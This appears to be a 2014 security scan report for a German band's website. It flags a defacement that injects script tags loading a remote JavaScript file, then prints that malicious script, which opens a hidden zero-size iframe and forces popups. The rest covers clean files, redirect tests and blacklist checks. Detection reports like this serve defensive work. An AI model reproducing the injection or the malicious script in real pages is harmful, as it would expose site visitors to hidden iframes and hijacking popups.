Scanned pages/files
Request | Server response | Status |
http://highway-65.de/ | 200 OK Content-Length: 23093 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: !--Hacked by -- <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <!--Hacked by --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" > <head> <base href="http://highway-65.de/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta ...[28542 bytes skipped]... | ||
http://narc.ir/mtp1376/secapps/a.js | 200 OK Content-Length: 2120 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="0" height="0" src="http://www.secapps.org/"></iframe>'); var needpopupfck = 1; var vc_cn = "__popUp"; var link = "http://www.secapps.org/"; if (readCookiefck(vc_cn)&&readCookiefck(vc_cn)==2) { needpopupfck = 0; }else{ needpopupfck = 1; } var Page_Popped_fck = false; var Page_Loaded_fck = false; var Page_Enter_fck; if (needpopupfck == 1) { InitPopfck(); } function InitPopf window.open('javascript:void(0)', '_parent','toolbar=1,location=1,directories=1,status=1,menubar=1,scrollbars=1,resizable=1'); window.focus(); if(window.open(link,'_blank','toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1')){ window.focus(); IncrementCountfck(); } else { window.focus(); if (Page_Loaded_fck) initAdLayer(); else XBrowserAddHandlerPops(window, "load", "initAdLayer") } } } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.secapps.org/ <iframe width="0" height="0" src="http://www.secapps.org/"> | ||
http://highway-65.de/components/com_jfbconnect/includes/jfbconnect.js | 200 OK Content-Length: 6553 Content-Type: application/javascript | clean |
http://highway-65.de/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://highway-65.de/modules/mod_superfishmenu/tmpl/js/jquery.js | 200 OK Content-Length: 55805 Content-Type: application/javascript | clean |
http://highway-65.de/modules/mod_superfishmenu/tmpl/js/jquery.event.hover.js | 200 OK Content-Length: 3595 Content-Type: application/javascript | clean |
http://highway-65.de/modules/mod_superfishmenu/tmpl/js/superfish.js | 200 OK Content-Length: 3959 Content-Type: application/javascript | clean |
http://highway-65.de/templates/tbc_fivepoint_unity/sifr.js | 200 OK Content-Length: 10361 Content-Type: application/javascript | clean |
http://highway-65.de/modules/mod_analytics/gatr.js | 200 OK Content-Length: 2019 Content-Type: application/javascript | clean |
http://highway-65.de/termine | 200 OK Content-Length: 10166 Content-Type: text/html | clean |
http://highway-65.de/band | 200 OK Content-Length: 10484 Content-Type: text/html | clean |
http://highway-65.de/band/fibi | 200 OK Content-Length: 10107 Content-Type: text/html | clean |
http://highway-65.de/band/jey | 200 OK Content-Length: 45366 Content-Type: text/html | clean |
http://highway-65.de/band/beiz | 200 OK Content-Length: 66299 Content-Type: text/html | clean |
http://highway-65.de/band/bully | 200 OK Content-Length: 10482 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: highway-65.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 18 Jun 2014 06:36:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: highway-65.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 18 Jun 2014 06:36:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: highway-65.de
Referer: http://www.google.com/search?q=highway-65.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: highway-65.de
Referer: http://www.google.com/search?q=highway-65.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=highway-65.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://highway-65.de/
Result: highway-65.de is not infected or malware details are not published yet.
Result: highway-65.de is not infected or malware details are not published yet.